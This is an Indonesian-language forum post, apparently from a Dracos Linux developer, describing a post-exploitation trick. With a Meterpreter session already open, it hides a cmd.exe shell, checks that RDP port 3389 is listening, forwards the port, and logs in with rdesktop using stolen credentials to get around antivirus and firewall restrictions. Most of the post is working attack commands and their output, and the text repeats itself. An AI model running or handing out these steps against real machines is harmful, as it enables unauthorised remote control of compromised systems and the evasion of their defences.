09-13-2012, 10:56 PM
hmm sedikit trik dari ane ... pernahkah kita menjalankan vnc dari meterpreter dan saat itu di tolak karena adanya antivirus atau perlindungan firewall atau tidak dapat konek rdp karena adanya pembatasan2 pada sistem ? so ini yang dapat anda lakukan
ane anggap anda sudah mendapatkan channel meterpreter ..dan tentu saja telah mendapatkan pass target dengan hashdump dan icognito .. hmmm sudah pernah ane posting di mari klo nda salah
Setelah memasuki shell , periksa apakah service remote berjalan dengan netstat
Okey ternyata memang dalam posisi open ( listening ) so kita tinggal melakukan forward ..
ok kita cek apa sudah berada pada daftar local port
ok done.. sekarang tinggal konek pake ip 127.0.0.1 ...
ss gk bisa di upload karena kegedean ....wkwkwkw --
for more information , feel free for sent email to me
[email protected]
DRACOS-LINUX
CORE-DEV
ane anggap anda sudah mendapatkan channel meterpreter ..dan tentu saja telah mendapatkan pass target dengan hashdump dan icognito .. hmmm sudah pernah ane posting di mari klo nda salah
Code:
meterpreter > execute -H -c -i -f cmd.exe
Process 116 created.
Channel 1 created.
Setelah memasuki shell , periksa apakah service remote berjalan dengan netstat
Code:
C:\WINDOWS\system32>netstat -na | find "3389"
netstat -na | find "3389"
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
Okey ternyata memang dalam posisi open ( listening ) so kita tinggal melakukan forward ..
Code:
meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
ok kita cek apa sudah berada pada daftar local port
Code:
meterpreter > portfwd list
0: 0.0.0.0:3389 -> 127.0.0.1:3389
1 total local port forwards.
ok done.. sekarang tinggal konek pake ip 127.0.0.1 ...
Code:
rdesktop -u target 192.168.2.6:3389
ss gk bisa di upload karena kegedean ....wkwkwkw --
for more information , feel free for sent email to me
[email protected]
DRACOS-LINUX
CORE-DEV
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only